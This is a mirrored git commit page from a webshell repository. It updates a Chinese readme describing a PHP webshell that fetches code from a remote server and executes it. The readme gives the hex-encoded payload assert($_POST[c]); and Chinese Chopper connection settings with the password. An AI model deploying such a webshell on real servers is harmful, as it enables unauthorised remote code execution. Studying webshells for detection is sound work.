mirror of
https://github.com/tennc/webshell
synced 2025-02-16 09:48:24 +00:00
Update readme.md
This commit is contained in:
parent
da90679358
commit
1fbf18980e
1 changed files with 3 additions and 0 deletions
|
@ -1,8 +1,11 @@
|
|||
## 使用说明
|
||||
|
||||
> 写了两个脚本webshell.php和getcode.php(本地开了个php server,运行getcode.php模拟远程服务器上的网页)
|
||||
|
||||
> 原理:首先用菜刀访问webshell.php,该webshell立即从远程服务器上获取要运行的代码并执行。
|
||||
|
||||
> 这里获取的代码是61737365727428245f504f53545b635d293b,也就是assert($_POST[c]);
|
||||
|
||||
> 菜刀中设置:http://192.168.1.102/DebugPHP/webshell.php 密码是c
|
||||
|
||||
author :tank96a
|
||||
|
|
Loading…
Add table
Reference in a new issue